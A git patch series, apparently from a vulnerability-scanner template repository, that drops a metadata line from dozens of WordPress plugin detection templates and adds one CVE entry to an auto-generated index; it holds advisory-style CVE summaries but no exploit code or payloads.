diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index e088ac07a6..6f95506748 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
-    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 8b163200bf..4404f87aab 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
-    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 2366a7dad7..8995434fce 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
-    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 71448e61e8..8175806cb8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
-    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index 717554b89f..db82bc7f43 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
-    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index fba5c8b09c..03ddae57bc 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
-    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index 631202198e..d6449bb5bf 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
-    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
-    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
-    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index aa1898c4ba..48ffb25245 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
-    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
-    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
-    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
-    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
-    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
-    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
-    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
-    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
-    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
-    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index fba45020e4..56dfdf4a59 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
-    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 0178c8e9fb..810fc82cde 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
-    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 017cf76f11..2276545093 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
-    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
-    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index bc83478f06..27f6d46c2b 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
-    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
-    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
-    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
-    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
-    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
-    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
-    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
-    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
-    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 8ddf17ee42b7339b3141d211d47e623c364680a1 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 28 Sep 2023 13:30:49 +0000
Subject: [PATCH 0576/1090] Auto Generated cves.json [Thu Sep 28 13:30:49 UTC
 2023] :robot:

---
 cves.json              | 1 +
 cves.json-checksum.txt | 2 +-
 2 files changed, 2 insertions(+), 1 deletion(-)

diff --git a/cves.json b/cves.json
index 90a1d52a17..3b37efed3a 100644
--- a/cves.json
+++ b/cves.json
@@ -2029,6 +2029,7 @@
 {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
 {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
 {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"high","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
+{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
 {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
 {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
 {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 554cdd5d98..56e6bbb8f2 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-6746b8c9a4fa68a5263fab717bdaed2f
+5a85d5352421da476ffa2611a57b717f

From 5077ecae67b815a63b1a2d4b6e75a7994da0e7d4 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 28 Sep 2023 22:52:08 +0530
Subject: [PATCH 0577/1090] Update clipbucket-installer.yaml

---
 http/misconfiguration/installer/clipbucket-installer.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/misconfiguration/installer/clipbucket-installer.yaml b/http/misconfiguration/installer/clipbucket-installer.yaml
index bd46615478..c83f4b93f4 100644
--- a/http/misconfiguration/installer/clipbucket-installer.yaml
+++ b/http/misconfiguration/installer/clipbucket-installer.yaml
